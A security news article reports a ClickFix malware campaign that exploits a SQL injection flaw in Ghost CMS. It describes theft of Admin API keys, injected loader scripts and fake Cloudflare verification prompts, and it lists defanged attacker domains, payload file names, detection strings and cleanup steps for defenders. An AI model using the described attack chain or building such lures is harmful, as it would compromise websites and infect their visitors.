Ghost CMS flaw exploited to poison more than 700 sites with ClickFix attacks

Attackers are exploiting a Ghost CMS SQL injection vulnerability to compromise websites and turn trusted pages into malware delivery traps. The campaign uses stolen Admin API keys to inject malicious JavaScript into articles, then shows visitors fake Cloudflare verification pages that push them into running harmful commands on Windows.

The campaign was detailed by Qianxin XLab, which said it identified more than 700 poisoned domains after first detecting the activity on May 7, 2026. The affected sites covered universities, AI and SaaS companies, media, fintech, security research, blockchain, and personal blogs.

The vulnerability at the center of the campaign is CVE-2026-26980, a SQL injection flaw in Ghost’s Content API. The official GitHub security advisory says Ghost versions 3.24.0 through 6.19.0 are affected and version 6.19.1 contains the fix.

How the Ghost CMS attack works

The attackers start by exploiting CVE-2026-26980 to read data from the Ghost database without authentication. That database access can expose the Admin API key, which gives attackers a way to modify posts and pages through legitimate Ghost API calls.

Once the Admin API key is stolen, the attackers do not need to log into the admin panel or upload files to the server manually. They can use Ghost’s own API to rewrite article content at scale and insert malicious JavaScript at the bottom of posts.

The NVD entry for CVE-2026-26980 describes the issue as allowing unauthenticated attackers to perform arbitrary reads from the database. NVD lists Ghost versions 3.24.0 through 6.19.0 as affected and says the issue was fixed in 6.19.1.

Item	Details
CVE	CVE-2026-26980
Product	Ghost CMS
Component	Content API
Vulnerability type	SQL injection
Affected versions	Ghost 3.24.0 through 6.19.0
Fixed version	Ghost 6.19.1
Main campaign impact	Admin API key theft and mass article poisoning

Why the stolen Admin API key matters

Ghost uses different API keys for different purposes. A Content API key is meant for reading public content, while an Admin API key can manage articles, themes, users, and other site data.

In this campaign, attackers used stolen Admin API keys to change published articles in bulk. This made the infection hard for visitors to notice because the original article content still looked normal.

A report from BleepingComputer notes that the compromised pages loaded a second-stage script and then showed visitors a fake Cloudflare-style verification prompt. The page asked users to run a command that ultimately downloaded malware.

The campaign uses ClickFix social engineering

ClickFix attacks trick users into believing they need to complete a technical step to fix a browser, CAPTCHA, or verification problem. In this case, the fake page pretends to be a Cloudflare human verification screen.

When the user clicks the fake verification step, the page copies a command to the clipboard. The user then receives instructions to press Win+R, paste the command, and press Enter. That action runs the attacker’s command locally.

Malwarebytes described the same campaign as a large ClickFix operation where trusted education and technology websites were used to push fake verification prompts that trick visitors into installing malware themselves.

• The visitor opens a legitimate but compromised Ghost-powered article.
• Injected JavaScript loads a second-stage script from attacker infrastructure.
• The script filters visitors and attempts to avoid scanners and researchers.
• Selected visitors see a fake Cloudflare verification page.
• The page instructs users to paste and run a command in Windows.
• The command downloads and runs malware on the visitor’s device.

Two threat clusters were active

Qianxin XLab said at least two different threat clusters were involved in the poisoning activity. Some domains appeared to be reinfected or overwritten by a second attacker after cleanup or after a competing script was already present.

One cluster used infrastructure such as clo4shara[.]xyz, cloud-verification[.]com, com-apps[.]cc, and web-telegram[.]ug. Another cluster used domains such as staticcloudflare[.]pro and script-dev[.]digital.

The Qianxin XLab timeline says the first round of scanning found 156 poisoned domains by May 10, 2026. By May 17, the number had grown to more than 700 affected domains.

Attack stage	What happens
CMS takeover	Attackers exploit CVE-2026-26980 to read sensitive database content
API key theft	Attackers extract the Ghost Admin API key
Page poisoning	Articles are modified through the Ghost Admin API
Two-stage loading	Injected JavaScript loads additional code from attacker domains
ClickFix lure	Visitors see a fake verification page
Malware delivery	The pasted command downloads and runs a payload

Payloads changed as the campaign evolved

The first wave used an update.zip flow that launched a Windows batch script. That script downloaded a DLL and ran it with rundll32, while opening a decoy page to distract the user.

Later activity shifted toward NotepadPlusPlus-themed payloads and an Electron-based stealer called UtilifySetup.exe. Qianxin XLab said the Electron payload used persistence and contacted web-telegram[.]ug every 30 seconds to receive instructions.

This evolution matters because the injected script on the compromised Ghost site can remain small while attackers change the payload served from their own infrastructure. Site owners may remove one visible payload but miss the loader that allows the attack chain to return.

Why trusted websites make the attack more effective

The campaign is more dangerous because users land on legitimate websites. A visitor may trust an article on a university, technology, media, or research site and assume any verification prompt is part of the browsing experience.

The social engineering step also avoids some traditional download warnings because the user performs the action manually. The page tells the user to run a command, and the user believes the command completes a verification process.

Malwarebytes warned that these instructions can look harmless, using language such as proving the user is human or fixing a connection issue. That familiar framing makes the attack easier to fall for.

What Ghost site owners should check

Ghost administrators should upgrade immediately to version 6.19.1 or later. They should also assume that a simple CMS update may not remove injected article content or invalidate already stolen keys.

The official GitHub security advisory recommends reviewing staff users and rotating keys because the vulnerability can expose a site’s API keys. It also says there is no application-level workaround, although a reverse proxy or WAF can temporarily block certain suspicious Content API query patterns.

Admins should inspect article content, code injection settings, themes, API keys, staff accounts, and access logs. Bulk PUT requests to Ghost Admin API endpoints should receive special attention.

• Upgrade Ghost to 6.19.1 or a newer release.
• Rotate Admin API keys, Content API keys, administrator passwords, and sessions.
• Review staff users and remove unknown or unused accounts.
• Search posts and pages for ghost_once_footer_ and sj.ssc/ipa/.
• Search article bodies for atob( combined with appendChild.
• Check for btoa(a.origin) in injected JavaScript.
• Audit Admin API logs for unusual bulk post updates.
• Inspect Code Injection settings and theme files for added script tags.

Detection indicators for defenders

Security teams should combine CMS-side indicators with endpoint-side indicators. A poisoned Ghost article may not prove that visitors were infected, but it should trigger investigation and user notification.

On the website side, defenders should look for injected loader fingerprints and abnormal API calls. On the visitor side, teams should check whether users downloaded files from cloud-verification[.]com, com-apps[.]cc, jalwat[.]com, taketwolabs[.]com, or related infrastructure.

The BleepingComputer report also noted that attackers used the stolen Admin API key to inject JavaScript into articles, while the second-stage code filtered visitors before serving the fake Cloudflare prompt.

Indicator type	Examples	Why it matters
Injected code	ghost_once_footer_, sj.ssc/ipa/, atob( with appendChild	Points to poisoned Ghost article content
Stage 2 domains	clo4shara[.]xyz, com-apps[.]cc, staticcloudflare[.]pro	Used to load additional scripts or campaign logic
Fake verification host	cloud-verification[.]com	Used for ClickFix-style social engineering
Payload names	installer.dll, update.bat, NotepadPlusPlus.dll, UtilifySetup.exe	Seen in payload delivery chains
Admin API activity	Unexpected bulk PUT requests to posts	Shows possible large-scale article tampering

Why patching alone may not be enough

Installing the fixed Ghost version closes the known SQL injection path, but it does not automatically clean poisoned articles or revoke secrets that attackers already stole. Site owners need to treat vulnerable, exposed Ghost installations as possible compromises.

That means rotating credentials, cleaning content at the database level, reviewing logs, and checking for reinfection. Some sites may have been targeted by more than one actor, so cleaning only one injected script may leave another behind.

The NVD record confirms the affected version range and the fixed version, but operational recovery requires more than version validation. Administrators need to verify that site content, API keys, and access logs no longer show attacker activity.

1. Take a backup for forensic review before cleaning.
2. Upgrade Ghost to 6.19.1 or later.
3. Rotate API keys, passwords, and active sessions.
4. Export or query article content for injected script patterns.
5. Remove malicious JavaScript from posts, pages, themes, and code injection settings.
6. Review at least 30 days of Admin API calls where available.
7. Notify visitors if the site served ClickFix lures during the compromise window.

Advice for visitors who saw a fake verification page

Visitors should treat any page that asks them to press Win+R, paste a command, and press Enter as malicious. Real CAPTCHA or Cloudflare verification checks do not require users to run commands on their computer.

If a user followed the instructions, they should disconnect the device from the network, run a full security scan, review downloaded files, check startup items, and change important passwords from a separate trusted device.

Users should also check browser downloads for update.zip, NotepadPlusPlus.zip, installer.dll, update.bat, NotepadPlusPlus.dll, and UtilifySetup.exe. Any interaction with those files should trigger a security review.

Bottom line

The Ghost CMS campaign shows how a CMS vulnerability can turn trusted websites into malware delivery infrastructure. Attackers used CVE-2026-26980 to steal Admin API keys, poison article content, and push ClickFix attacks at visitors.

Ghost administrators should update immediately, rotate credentials, inspect content for injected JavaScript, and audit Admin API activity. Visitors should never run commands copied from a fake verification page.

The strongest response combines patching, cleanup, credential rotation, log review, and user notification. Without those steps, a patched Ghost site may still contain poisoned content or exposed keys from the earlier compromise.

FAQ